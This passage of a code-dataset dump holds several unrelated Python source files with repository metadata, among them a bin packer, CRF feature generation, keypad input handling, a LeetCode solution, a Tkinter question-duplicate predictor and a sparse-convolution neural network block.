len(arr)-1):\r\n for j in range(i+1, len(arr)):\r\n if BinPacker.msort(arr[i], arr[j], criteria) > 0:\r\n BinPacker.swap(arr,i,j)\r\n\r\n def fit(self, blocks_src, criteria = ['height']):\r\n res = []\r\n blocks = []\r\n \r\n for i in range(len(blocks_src)):\r\n blocks.append(blocks_src[i])\r\n\r\n BinPacker.sort(blocks, criteria)\r\n\r\n for i in range(len(blocks)):\r\n block = blocks[i]\r\n w = block[\"width\"]\r\n h = block[\"height\"]\r\n node = BinPackerNode.find(self.root, w,h)\r\n if not node:\r\n continue\r\n if not node.split(block[\"data\"] if \"data\" in block else \"empty\", w,h):\r\n continue\r\n node.width = w\r\n node.height = h\r\n res.append(node)\r\n return res\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n blocks = [\r\n { \"width\": 100, \"height\": 100, \"data\": {\"color\":0xff0000} },\r\n { \"width\": 100, \"height\": 100, \"data\": {\"color\":0x0000ff} },\r\n { \"width\": 80, \"height\": 80 },\r\n { \"width\": 80, \"height\": 80, \"data\": {\"color\":0x0} },\r\n ]\r\n packer = BinPacker(300,300)\r\n res = packer.fit(blocks, [\"area\"])\r\n\r\n for i in range(len(res)):\r\n node = res[i]\r\n if node.data == \"empty\":\r\n continue\r\n color = node.data[\"color\"]\r\n print(node.x, node.y, node.width, node.height, 
color)\r\n\r\n","repo_name":"0r4nd/HandwritingRecognition","sub_path":"src/BinPacker.py","file_name":"BinPacker.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"341342017","text":"from collections import namedtuple\n\nimport numpy as np\n\nFeature = namedtuple(\"Feature\", 'var assignment param_idx')\n\n\ndef compute_conditioned_singleton_features(mat, model_params, param_idx_base=0):\n height, width = mat.shape\n n_hidden_states = model_params['num_hidden_states']\n n_observed_states = model_params['num_observed_states']\n\n features = []\n for hidden_state in range(n_hidden_states):\n for feature_num in range(width):\n for v in range(height):\n param_idx = np.ravel_multi_index([mat[v, feature_num], feature_num, hidden_state],\n dims=[n_observed_states, width, n_hidden_states],\n order='F')\n features.append(Feature(var=(v, ), assignment=(hidden_state, ), param_idx=param_idx_base+param_idx))\n\n return features\n\n\ndef compute_unconditioned_singleton_features(length, model_params, param_idx_base=0):\n features = []\n for state in range(model_params['num_hidden_states']):\n for v in range(length):\n features.append(Feature(var=(v, ), assignment=(state, ), param_idx=param_idx_base+state))\n return features\n\n\ndef compute_unconditioned_pair_features(length, model_params, param_idx_base=0):\n features = []\n if length < 2:\n return features\n K = model_params['num_hidden_states']\n for state1 in range(K):\n for state2 in range(K):\n param_idx = param_idx_base + np.ravel_multi_index([state2, state1], [K, K], order='F')\n for v in range(length-1):\n features.append(Feature(var=(v, v+1), assignment=(state1, state2), param_idx=param_idx))\n return features\n\n\ndef generate_all_features(mat, model_params):\n param_idx_base = 0\n\n all_features = []\n\n features = compute_conditioned_singleton_features(mat, model_params, param_idx_base)\n if features:\n all_features.extend(features)\n # we can not look into max(f.param_idx for f in features) as some combination might not have been observed\n # so I'm computing this using below formula.\n # In case there are more than one conditioned features, one will have to adjust it accordingly.\n # Code by Daphne Koller handles it differently, but I didn't understand it, so I used below formula.\n param_idx_base = mat.shape[1] * model_params['num_hidden_states'] * model_params['num_observed_states']\n\n for fn in [compute_unconditioned_singleton_features, compute_unconditioned_pair_features]:\n features = fn(mat.shape[0], model_params, param_idx_base)\n if features:\n param_idx_base = max(f.param_idx for f in features) + 1\n all_features.extend(features)\n\n return {'num_params': param_idx_base, 'features': all_features}\n\n\n\n\n","repo_name":"DhruvPatel01/coursera_pgm_python","sub_path":"CRF-Learning-For-OCR/generate_all_features.py","file_name":"generate_all_features.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"7806732239","text":"import time\n\nimport adafruit_matrixkeypad\nimport board\nimport digitalio\n\nfrom observer_design_pattern.subject import Subject\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\nclass KeypadSubject(Subject):\n def __init__(self):\n super(KeypadSubject, self).__init__()\n rows = [digitalio.DigitalInOut(x) for x in (board.D26, board.D19, board.D13, board.D6)]\n cols = [digitalio.DigitalInOut(x) for x in (board.D5, board.D20, board.D11, board.D9)]\n keys = ((1, 2, 3, \"A\"),\n (4, 5, 6, \"B\"),\n (7, 8, 9, \"C\"),\n (\"*\", 0, \"#\", \"D\"))\n\n self.keypad = adafruit_matrixkeypad.Matrix_Keypad(rows, cols, keys)\n\n def get_latest_entered_keys_string(self):\n return self.get_state()\n\n @staticmethod\n def create_string_from_keys_array(entered_keys_array):\n entered_keys_string = ''\n for key in entered_keys_array:\n entered_keys_string += str(key)\n return entered_keys_string\n\n def _get_pressed_keys(self):\n def _is_accept_key(pressed_key):\n return pressed_key == 'A'\n\n def _keys_not_yet_pressed(pressed_keys):\n return len(pressed_keys) == 0\n\n entered_keys_array = []\n LOGGER.info('Listening for keypad presses...')\n while True:\n if not _keys_not_yet_pressed(self.keypad.pressed_keys):\n pressed_key = self.keypad.pressed_keys[0]\n if _is_accept_key(pressed_key):\n self.set_state(self.create_string_from_keys_array(entered_keys_array))\n entered_keys_array = []\n else:\n entered_keys_array.append(pressed_key)\n time.sleep(0.2)\n","repo_name":"PiAndArduinoGuy/hardware_security_controller","sub_path":"app/src/subject/keypad_subject.py","file_name":"keypad_subject.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7482283270","text":"#################solution###############\n######faster fibonacci##################\ndef fibonacci(n):\n\tcurrent = 0\n\tafter = 1 \n\tfor i in range(0,n):\n\t\tcurrent , after = after, current + after\n\treturn current\n\n#############quiz########################\ndef fibonacci(n):\n i = 2\n result = [0,0]\n result[0] = 0\n result[1] = 1\n while i <= n:\n result.append(result[i-1]+result[i-2])\n i = i + 1\n return result[n]\n\n##########mathematically####################\ndef fibonacci(n):\n if n ==0:\n return 0\n if n == 1:\n return 1\n if n > 1:\n return fibonacci(n-1) + fibonacci(n-2)\n","repo_name":"silverashashash/Udacity101","sub_path":"Unit6/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"762345766","text":"print(\"Hello world!\")\n\narr = []\nlim = 0\n\nwhile(True) :\n print(\"수 몇개를 정렬하시겠습니까?\\n>>\",end='')\n lim = input()\n if lim.isdigit() :\n lim = int(lim)\n break\n else :\n print(\"입력이 잘못됐습니다.\\n다시 입력해주세요.\")\n continue\n\n\ni = 0\nwhile i < lim :\n while(True) :\n print(\"입력할 수\\n>>\",end='')\n e = input()\n if e.isdigit() :\n e = int(e)\n arr.append(e)\n #print(arr[i])\n break\n else :\n print(\"입력이 잘못됐습니다.\\n다시 입력해주세요.\")\n continue\n i += 1\n #print(\"arr = {}\".format(arr))\narr.sort()\n#print(\"at input end : arr = {}\".format(arr))\nprint(\"\\n\\n입력하신 수는 \",end='')\ni = 0\nwhile i < lim :\n print(\"{}\".format(arr[i]),end=\"\")\n if not i == (lim - 1) :\n print(' , ',end=\"\")\n i += 1\nprint(\"이 있으며\")\nprint(\"가장 큰 수는 {}입니다.\".format(arr[lim - 1]))\n\n","repo_name":"ghdwpaks/python","sub_path":"it/day08/homework/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9643542088","text":"import random\nimport time\n\n\ndef download(filename):\n print(f'开始下载{filename}.')\n time.sleep(random.randint(2, 6))\n print(f'{filename}下载完成.')\n\n\ndef upload(filename):\n print(f'开始上传{filename}.')\n time.sleep(random.randint(4, 8))\n print(f'{filename}上传完成.')\n\n\n# download('MySQL从删库到跑路.avi')\n# upload('Python从入门到住院.pdf')\n\nstart = time.time()\ndownload('MySQL从删库到跑路.avi')\nend = time.time()\nprint(f'花费时间: {end - start:.3f}秒')\nstart = time.time()\nupload('Python从入门到住院.pdf')\nend = time.time()\nprint(f'花费时间: {end - start:.3f}秒')\n","repo_name":"mazy699/PythonDemo","sub_path":"Python-Core-50-Courses/c16/c16-01.py","file_name":"c16-01.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7442374345","text":"import os.path\n\nimport cherrypy\n\nimport config\nfrom webapp import WebApp\n\nif __name__ == '__main__':\n cherrypy.config.update({\n 'server.socket_host': '0.0.0.0',\n })\n web_app = WebApp(config)\n conf = {\n '/': {\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n }\n }\n cherrypy.quickstart(web_app, '/', conf)\n","repo_name":"giraudan/dockerize-this","sub_path":"webapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38383284352","text":"# 链接:https://leetcode.com/problems/check-if-word-can-be-placed-in-crossword/\n# 题意:给定一个 m * n 的矩阵 board ,表明一个填字游戏的当前状态,\n# board 仅由英文小写字母, ' ' 和 '#' 组成,\n# ' ' 表示可以填入字母,'#' 表示不能填入字母。\n# 现在判断给定的单词 word 是否能在满足以下条件下被填入矩阵中?\n# 条件:\n# 1. '#' 不能被填入;\n# 2. ' ' 可以填入��个字母;\n# 3. 如果 word 可以被横向填入,既可以从左往右填入,也可以从右往左填入,\n# 但要保证 word 左右两侧都是没有 ' ' 和字母;\n# 4. 如果 word 可以被纵向填入,既可以从上往下填入,也可以从下往上填入,\n# 但要保证 word 上下两侧都是没有 ' ' 和字母;\n\n# 数据限制:\n# m == board.length\n# n == board[i].length\n# 1 <= m * n <= 2 * 10 ^ 5\n# board[i][j] 是 ' ', '#', 或者一个英文小写字母\n# 1 <= word.length <= max(m, n)\n# word 只含有英文小写字母\n\n# 输入: board = [[\"#\", \" \", \"#\"], [\" \", \" \", \"#\"], [\"#\", \"c\", \" \"]], word = \"abc\"\n# 输出: true\n# 解释:\n# word 可以被纵向从上往下填入第二列\n\n# 输入: board = [[\" \", \"#\", \"a\"], [\" \", \"#\", \"c\"], [\" \", \"#\", \"a\"]], word = \"ac\"\n# 输出: false\n# 解释:\n# 无论如何填入,最后 word 的两侧都会有 ' ' 或者字母\n\n# 输入: board = [[\"#\", \" \", \"#\"], [\" \", \" \", \"#\"], [\"#\", \" \", \"c\"]], word = \"ca\"\n# 输出: true\n# 解释:\n# \"ca\" 可以被横向从右往左填入右下角\n\n\n# 思路: 枚举\n#\n# 数据量看起来很唬人,但只要直接暴力即可,\n# 我们枚举所有点,如果是 '#' ,则它的四个方向是可能被填入的,\n# 枚举判断每个方向是否能按题意填入即可,\n# \n# 开始寻找边界点的时间复杂度: O(m * n)\n# 然后判断是否能填入时,每个 字母 和 ' ' 最多只会被访问四次,\n# 所以时间复杂度仍是 O(m * n)\n#\n# 时间复杂度: O(m * n)\n# 空间复杂度: O(1)\n\n\nDIR = ((0, 1), (0, -1), (1, 0), (-1, 0))\n\n\nclass Solution:\n def placeWordInCrossword(self, board: List[List[str]], word: str) -> bool:\n # 获取矩阵大小\n m, n = len(board), len(board[0])\n first_ch = word[0]\n\n # 判断一个位置是否在矩阵中\n def is_ok(r: int, c: int) -> bool:\n return 0 <= r < m and 0 <= c < n\n\n # 判断从边界点 (r, c) 开始,按照 (dr, dc) 方向是否能填入 word\n def can_place(r: int, c: int, dr: int, dc: int) -> bool:\n # 如果前一个位置不是边界点,则直接返回 False\n if is_ok(r - dr, c - dc) and board[r - dr][c - dc] != '#':\n return False\n # 开始填入单词\n for ch in word:\n # 如果这个位置在矩阵外 或 这个位置既不是 ' ' 也不是 ch ,\n # 则此时不能填入,直接返回 False\n if not is_ok(r, c) or (board[r][c] != ' ' and board[r][c] != ch):\n return False\n # 走到下一个位置\n r, c = r + dr, c + dc\n # 已经填入全部 word ,判断当前位置是否处于边界点\n return not is_ok(r, c) or board[r][c] == '#'\n\n # 枚举边界点\n for r, row in enumerate(board):\n for c, ch in enumerate(row):\n # 如果不是 ' ' ,则不是边界点,直接跳过\n if ch == ' ' or ch == first_ch:\n # 此时可能能合法填入,判断是四个方向是否能够填入\n for dr, dc in DIR:\n # 如果能够填入 word ,则直接返回 True\n if can_place(r, c, dr, dc):\n return True\n # 所有情况都不能填入,返回 False\n return False\n","repo_name":"idealism-xxm/LeetCode","sub_path":"Python3/src/2001 ~ 2100/2018 - Check if Word Can Be Placed In Crossword.py","file_name":"2018 - Check if Word Can Be Placed In Crossword.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"2538117064","text":"\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\n\r\nfrom tensorflow.python.keras.models import load_model\r\nimport tensorflow.python.keras.backend as K\r\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\r\nimport json\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\nimport csv\r\n\r\n\r\n# gets a whole question inside text variable on which preprocessing is done and then the question is splitted into word indices and returned\r\ndef text_to_word_list(text):\r\n text = str(text)\r\n text = text.lower()\r\n\r\n # Clean the text\r\n text = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=]\", \" \", text)\r\n text = re.sub(r\"what's\", \"what is \", text)\r\n text = re.sub(r\"\\'s\", \" \", text)\r\n text = re.sub(r\"\\'ve\", \" have \", text)\r\n text = re.sub(r\"can't\", \"cannot \", text)\r\n text = re.sub(r\"n't\", \" not \", text)\r\n text = re.sub(r\"i'm\", \"i am \", text)\r\n text = re.sub(r\"\\'re\", \" are \", text)\r\n text = re.sub(r\"\\'d\", \" would \", text)\r\n text = re.sub(r\"\\'ll\", \" will \", text)\r\n text = re.sub(r\",\", \" \", text)\r\n text = re.sub(r\"\\.\", \" \", text)\r\n text = re.sub(r\"!\", \" ! \", text)\r\n text = re.sub(r\"\\/\", \" \", text)\r\n text = re.sub(r\"\\^\", \" ^ \", text)\r\n text = re.sub(r\"\\+\", \" + \", text)\r\n text = re.sub(r\"\\-\", \" - \", text)\r\n text = re.sub(r\"\\=\", \" = \", text)\r\n text = re.sub(r\"'\", \" \", text)\r\n text = re.sub(r\"(\\d+)(k)\", r\"\\g<1>000\", text)\r\n text = re.sub(r\":\", \" : \", text)\r\n text = re.sub(r\" e g \", \" eg \", text)\r\n text = re.sub(r\" b g \", \" bg \", text)\r\n text = re.sub(r\" u s \", \" american \", text)\r\n text = re.sub(r\"\\0s\", \"0\", text)\r\n text = re.sub(r\" 9 11 \", \"911\", text)\r\n text = re.sub(r\"e - mail\", \"email\", text)\r\n text = re.sub(r\"j k\", \"jk\", text)\r\n text = re.sub(r\"\\s{2,}\", \" \", text)\r\n\r\n text = text.split()\r\n\r\n return text\r\n\r\n\r\n# write test questions to .csv file\r\ndef write_to_csv(question1, question2, is_duplicate, percent):\r\n with open('prediction_test_questions.csv', mode='a') as question_file:\r\n question_writer = csv.writer(\r\n question_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_ALL)\r\n question_writer.writerow([question1, question2, is_duplicate, percent])\r\n\r\n\r\n# manhattan distance calculation function\r\ndef manhattan_distance(left, right):\r\n return K.exp(-K.sum(K.abs(left-right), axis=1, keepdims=True))\r\n\r\n\r\n# load trained model\r\nmodel_path = 'model_for_gui.h5'\r\nnew_model = load_model(model_path)\r\n\r\n\r\n# import vocabulary dictionary and parse it in python\r\ndict_path = 'vocabulary_dictionary.json'\r\n\r\n\r\n# read dictionary file\r\nwith open(dict_path, 'r') as my_file:\r\n data = my_file.read()\r\n\r\n# parse dictionary\r\nvocab_dictionary = json.loads(data)\r\n\r\n\r\n# function for tkinter button-click event\r\ndef get_que(event):\r\n\r\n print('\\n\\n\\n')\r\n question1 = First_que.get()\r\n question2 = Second_que.get()\r\n print(question1)\r\n print(question2)\r\n\r\n # Get the value stored in the entries\r\n q1 = word_indexer(First_que.get())\r\n q2 = word_indexer(Second_que.get())\r\n\r\n # Delete the value in the entry\r\n First_que.delete(0, \"end\")\r\n Second_que.delete(0, \"end\")\r\n\r\n # get result and percentage from prediction\r\n is_duplicate, percent = result_prediction(q1, q2)\r\n\r\n # write final result to csv file\r\n write_to_csv(question1, question2, is_duplicate, 
percent)\r\n\r\n\r\n# function to predict result from two supplied questions\r\n# that returns is_duplicate result and percentage\r\ndef result_prediction(q1, q2):\r\n\r\n    # preprocessing for prediction\r\n    question_list = [q1, q2]\r\n    question_list = pad_sequences(question_list, maxlen=50)\r\n\r\n    # convert to numpy array to feed to model\r\n    que1 = np.asarray(question_list[0])\r\n    que2 = np.asarray(question_list[1])\r\n\r\n    # predict sample questions on saved model using above numpy array\r\n    pred = new_model.predict([[que1], [que2]])\r\n\r\n    # Prediction threshold\r\n    if pred >= 0.5:\r\n        print(\"Duplicate -> \", str(pred[0][0]*100) + ' %')\r\n        return 1, str(pred[0][0]*100)\r\n    else:\r\n        print(\"Not Duplicate -> \", str(pred[0][0]*100) + ' %')\r\n        return 0, str(pred[0][0]*100)\r\n\r\n\r\n# function to index tokenized words using training vocabulary dictionary\r\ndef word_indexer(question):\r\n    ques_index = []\r\n\r\n    for word in text_to_word_list(question):\r\n        if word in vocab_dictionary:\r\n            ques_index.append(vocab_dictionary[word])\r\n    return ques_index\r\n\r\n\r\n# ------------------------GUI STARTS HERE------------------------\r\nroot = Tk()\r\nroot.title(\"Duplicate Question Detection\")\r\nroot.minsize(width=800, height=150)\r\nroot.maxsize(width=800, height=150)\r\n\r\n# rows start at 0, 1, ...\r\n# columns start at 0, 1, ...\r\n# sticky defines how the widget expands (N, NE, E, SE,\r\n# S, SW, W, NW)\r\n# padx and pady provide padding around the widget above\r\n# and below it\r\n\r\n# First label\r\nLabel(root, text=\"First Question\").grid(row=0, sticky=W, padx=10)\r\nFirst_que = Entry(root, width=100)\r\nFirst_que.grid(row=0, column=1, sticky=E, pady=10)\r\n\r\n# Second label\r\nLabel(root, text=\"Second Question\").grid(row=1, sticky=W, padx=10)\r\nSecond_que = Entry(root, width=100)\r\nSecond_que.grid(row=1, column=1, sticky=E, pady=10)\r\n\r\n# Button label\r\nequalButton = Button(root, text=\"Submit\")\r\nequalButton.grid(row=3)\r\n\r\n# Button click event-> function 'get_que' is called\r\nequalButton.bind(\"<Button-1>\", get_que)\r\n\r\n# GUI END\r\nroot.mainloop()\r\n","repo_name":"MohitDhungana/duplicate_question_detection","sub_path":"DQD_with_GUI_and_Prediction.py","file_name":"DQD_with_GUI_and_Prediction.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
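# Editorial aside (not part of the script above): what pad_sequences does to the two
# variable-length word-index lists before they reach the model -- by default shorter
# sequences are left-padded with zeros up to maxlen:
from tensorflow.python.keras.preprocessing.sequence import pad_sequences

padded = pad_sequences([[5, 8, 2], [7, 1]], maxlen=5)
print(padded)
# [[0 0 5 8 2]
#  [0 0 0 7 1]]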
+{"seq_id":"31854272378","text":"import torch\nimport torch.nn as nn\nfrom torchsparse import SparseTensor\nimport spconv.pytorch as spconv\nfrom torch.utils.checkpoint import checkpoint\nimport torchsparse.nn as spnn\n\n\n\ndef spconv2ts(sct: spconv.SparseConvTensor):\n \"\"\"\n sct: SparseConvTensor (spconv)\n \n returns: \n - st: SparseTensor (torchsparse)\n - sct_save: a dict including some info from sct,\n for the use of inverse transformation.\n \"\"\"\n feats = sct.features\n coords = torch.index_select(sct.indices, 1, \n torch.LongTensor([3,2,1,0]).to(sct.indices.device)).contiguous()\n st = SparseTensor(feats, coords, 1)\n\n sct_save = dict()\n sct_save['batch_size'] = sct.batch_size\n sct_save['benchmark'] = sct.benchmark\n sct_save['benchmark_record'] = sct.benchmark_record\n sct_save['grid'] = sct.grid\n sct_save['indice_dict'] = sct.indice_dict\n sct_save['spatial_shape'] = sct.spatial_shape\n sct_save['voxel_num'] = sct.voxel_num\n\n return st, sct_save\n \n\ndef ts2spconv(st: SparseTensor, sct_save: dict):\n \"\"\"\n - st: SparseTensor (torchsparse)\n - sct_save: a dict including some additional info for sct\n \n returns: \n sct: SparseConvTensor (spconv)\n \"\"\"\n features = st.feats\n indices = torch.index_select(st.coords, 1, \n torch.LongTensor([3,2,1,0]).to(st.coords.device)).contiguous()\n sct = spconv.SparseConvTensor(\n features,\n indices,\n spatial_shape=sct_save['spatial_shape'],\n batch_size=sct_save['batch_size'],\n grid=sct_save['grid'],\n voxel_num=sct_save['voxel_num'],\n indice_dict=sct_save['indice_dict'],\n benchmark=sct_save['benchmark']\n )\n sct.benchmark_record = sct_save['benchmark_record']\n\n return sct\n\n\nimport torchsparse.nn.functional as F\nfrom torchsparse.nn.utils import get_kernel_offsets\n\n\n# x: SparseTensor->large, stride: scale of kernel \n# return : SparseTensor->small\ndef large_to_small(large_x, stride):\n x_C = torch.cat([torch.div(large_x.C[:,:3], stride, rounding_mode='floor').int(), large_x.C[:,3:]], dim=1)\n large_x_hash = F.sphash(x_C.to(large_x.F.device))\n small_x_C = torch.unique(x_C, dim=0)\n small_x_hash = F.sphash(small_x_C.to(large_x.F.device))\n\n idx_query = F.sphashquery(large_x_hash, small_x_hash)\n counts = F.spcount(idx_query.int(), len(small_x_hash))\n inserted_feat = F.spvoxelize(large_x.F, idx_query, counts)\n small_x = SparseTensor(inserted_feat, small_x_C, stride)\n\n small_x.cmaps = large_x.cmaps\n small_x.kmaps = large_x.kmaps\n return small_x, idx_query, counts\n\n\ndef small_to_large_v2(small_x, large_x, idx, counts):\n # local offsets to index neighbors\n ## [2^3,3]\n kernel_size = 3\n offsets = get_kernel_offsets(kernel_size, 1, 1, device=large_x.F.device)\n neighbor_hash = F.sphash(\n small_x.C, offsets\n )\n\n small_hash = F.sphash(small_x.C.to(large_x.F.device))\n\n idx_query = F.sphashquery(neighbor_hash, small_hash)\n idx_query = idx_query.transpose(0,1).contiguous()\n idx_query_flat = idx_query.view(-1)\n f = torch.cat([small_x.F, torch.ones_like(small_x.F[:,:1]).to(small_x.F.device)], dim=1)\n f = f*counts.unsqueeze(dim=-1)\n weights = torch.ones(small_x.F.shape[0], kernel_size**3).to(small_x.F.device).float()\n weights[idx_query == -1] = 0\n new_feat = F.spdevoxelize(f, idx_query, weights, kernel_size)\n new_feat = new_feat[:,:-1] / new_feat[:,-1:]\n\n large_x.F = new_feat[idx]\n\n return large_x\n\n\nclass TSELKBlock(nn.Module):\n def __init__(self, inc, outc, baseop='cos'):\n super().__init__()\n self.inc = inc\n self.outc = outc\n self.baseop = baseop\n self.pre_mix = nn.Sequential(\n 
nn.Linear(self.inc, self.inc, bias = False),\n nn.LayerNorm(self.inc, eps=1e-6)\n )\n self.local_mix = nn.Sequential(\n spnn.Conv3d(self.inc, self.inc, kernel_size=3, dilation=1,\n stride=1),\n )\n\n self.pos_weight = nn.Sequential(\n nn.Linear(3, self.inc, bias=False),\n )\n \n self.norm = nn.LayerNorm(self.inc, eps=1e-6)\n self.norm_local = nn.LayerNorm(self.inc, eps=1e-6)\n self.activate = nn.ReLU(True)\n\n\n def forward(self, sct: spconv.SparseConvTensor, stride):\n \"\"\"\n sct: SparseConvTensor (in spconv)\n \"\"\"\n st, sct_save = spconv2ts(sct)\n new_st = self.forward_(st, stride)\n new_sct = ts2spconv(new_st, sct_save)\n return new_sct\n\n\n def forward_(self, st: SparseTensor, stride):\n '''\n st: SparseTensor\n stride: scale of large kernel\n '''\n F_input = self.pre_mix(st.F)\n local_mix = self.local_mix(st)\n \n if self.baseop == 'sin':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_sin, F_weighted_cos], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos - large_st.F[:,self.inc:]*pos_weight_sin\n\n elif self.baseop == 'cos':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight = pos_weight[:,:self.inc//2].repeat([1,2]) # channel grouping\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_cos, F_weighted_sin], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:]*pos_weight_sin\n\n elif self.baseop == 'cos_x_alpha':\n pos_weight = self.pos_weight(st.C[:,:3].float())*self.alpha\n pos_weight = pos_weight[:,:self.inc//2].repeat([1,2]) # channel grouping\n\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n F_weighted_linear = F_input*pos_weight\n st.F = torch.cat([F_weighted_cos, F_weighted_sin, F_weighted_linear], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:2*self.inc]*pos_weight_sin + (large_st.F[:,2*self.inc:]-F_weighted_linear)\n\n elif self.baseop == 'cos_sin':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_cos, F_weighted_sin], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = (large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:]*pos_weight_sin) + \\\n (large_st.F[:,self.inc:]*pos_weight_cos - large_st.F[:,:self.inc]*pos_weight_sin)\n\n elif self.baseop == 'x':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight = pos_weight[:,:self.inc//2].repeat([1,2])\n \n F_weighted_linear = F_input*pos_weight\n st.F = 
torch.cat([F_weighted_linear], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n\n new_st_F = large_st.F-F_weighted_linear\n\n new_st_F = self.norm(new_st_F)\n local_F = self.norm_local(local_mix.F)\n new_st_F = self.activate(new_st_F+local_F)\n\n large_st.F = new_st_F\n\n return large_st\n\n\n# no additional bn in v2\n# CAUTION: DEPRECATED! Used in v2!\nclass TSELKBlock_no_tail_norm(nn.Module):\n def __init__(self, inc, outc, baseop='cos'):\n super().__init__()\n self.inc = inc\n self.outc = outc\n self.baseop = baseop\n self.pre_mix = nn.Sequential(\n nn.Linear(self.inc, self.inc, bias = False),\n nn.LayerNorm(self.inc, eps=1e-6)\n )\n self.pos_weight = nn.Sequential(\n nn.Linear(3, self.inc, bias=False),\n )\n self.norm = nn.BatchNorm1d(self.inc) \n\n\n def forward(self, sct: spconv.SparseConvTensor, stride):\n \"\"\"\n sct: SparseConvTensor (in spconv)\n \"\"\"\n st, sct_save = spconv2ts(sct)\n new_st = self.forward_(st, stride)\n new_sct = ts2spconv(new_st, sct_save)\n return new_sct\n\n\n def forward_(self, st: SparseTensor, stride):\n '''\n st: SparseTensor\n stride: scale of large kernel\n '''\n # 1. pos weight\n # F_input = st.F # self.pre_mix(st.F)\n F_input = self.pre_mix(st.F)\n if self.baseop == 'exp':\n pos_weight = torch.exp(self.pos_weight(st.C[:,:3].float()) / 100.0)\n F_weighted = F_input*pos_weight\n st.F = F_weighted\n\n small_st, idx = large_to_small(st, stride=stride)\n large_st = small_to_large(small_st, st, idx)\n\n new_st_F = large_st.F / pos_weight\n elif self.baseop == 'sin':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_sin, F_weighted_cos], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos - large_st.F[:,self.inc:]*pos_weight_sin\n\n elif self.baseop == 'cos':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_cos, F_weighted_sin], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:]*pos_weight_sin\n\n # new_st_F = self.norm(new_st_F)\n\n large_st.F = new_st_F\n\n return 